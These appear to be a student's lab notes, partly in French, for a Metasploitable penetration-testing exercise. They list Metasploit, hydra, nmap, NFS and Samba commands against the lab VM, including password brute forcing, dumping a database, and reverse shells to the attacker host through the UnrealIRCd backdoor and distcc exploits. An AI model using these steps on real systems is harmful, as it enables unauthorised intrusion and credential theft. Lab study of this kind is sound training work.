Metasploitable

. \VBoxManage . exe modifyvm Metasploitable —acpi off
. \VBoxManage . exe modifyvm Metasploitable —ioapic off

# Question 1
services -p 3306 -u -R
services -p 80 -u -R
services -p 21 -u -R

# Question 2
db_nmap -v -T4 -n 172.16.2.12 -p- -sT

# Question 3
search nfs
use auxiliary/scanner/nfs/nfsmount
info
set RPORT 111
set RHOSTS 172.16.2.12 
run
msf6 auxiliary(scanner/nfs/nfsmount) > run
[+] 172.16.2.12:111       - 172.16.2.12 Mountable NFS Export: / [*]
[*] 172.16.2.12:111       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# Question 4
apt install nfs-common
sudo mkdir /opt/metasploitable
sudo mount 172.16.2.12:/ /opt/metasploitable

# Question 5
set PASS_FILE /usr/share/john/password.lst
set STOP_ON_SUCCESS true
RHOSTS 172.16.2.12
set THREAD 4

# Question 6 
// Ne fonctionne pas
- 172.16.2.12:3306 - LOGIN FAILED: root: (Unable to Connect: invalid packet: scramble_length(0) != length of scramble(21))
hydra -l root -P /usr/share/john/password.lst mysql://172.16.2.12 -t 32 -I

# Question 7
mysql --skip-ssl -h 172.16.2.12 -u root -p monsitepourri 
mysqldump --skip-ssl -h 172.16.2.12 -u root -p monsitepourri > dumpsql --default-character-set=latin1
sql> select * from access

mot de passe de batman: SupermanEstClarkKent!	

# Question 8
search scanner postgre
use scanner/postgres/postgres_login
set RHOSTS 172.16.2.12
set STOP_ON_SUCCESS true
set USERNAME root
run

# Question 9
[+] 172.16.2.12:5432 - Login Successful: postgres:postgres@template1

# Question 10
psql -h 172.16.2.12 -U postgres
postgres=# select version();
                                            version                                            
-----------------------------------------------------------------------------------------------
 PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)

# Question 11
search ircd 
use exploit/unix/irc/unreal_ircd_3281_backdoor
show payloads 
set payload 6
set LHOST 172.16.2.13
=> reverse shell -> whoami root

# Question 12 
3632 est le port de distccd un compilateur c et c++

# Question 13
search distccd 
use exploit/unix/misc/distcc_exec
show options 
show payloads
set RHOSTS 172.16.2.12
set LHOSTS 172.16.2.13
set payload 6
=> Reverse Shell -> whoami daemon

# Question 14
smbclient -N -L 172.16.2.12

# Question 15
use auxiliary/admin/smb/samba_symlink_traversal
set rhosts 172.16.2.12
set smbshare tmp
run

Le partage faillible est /tmp

# Question 16
smbclient --no-pass //172.16.2.12/tmp

# Question 17 et 18
-> A revoir

# Question 19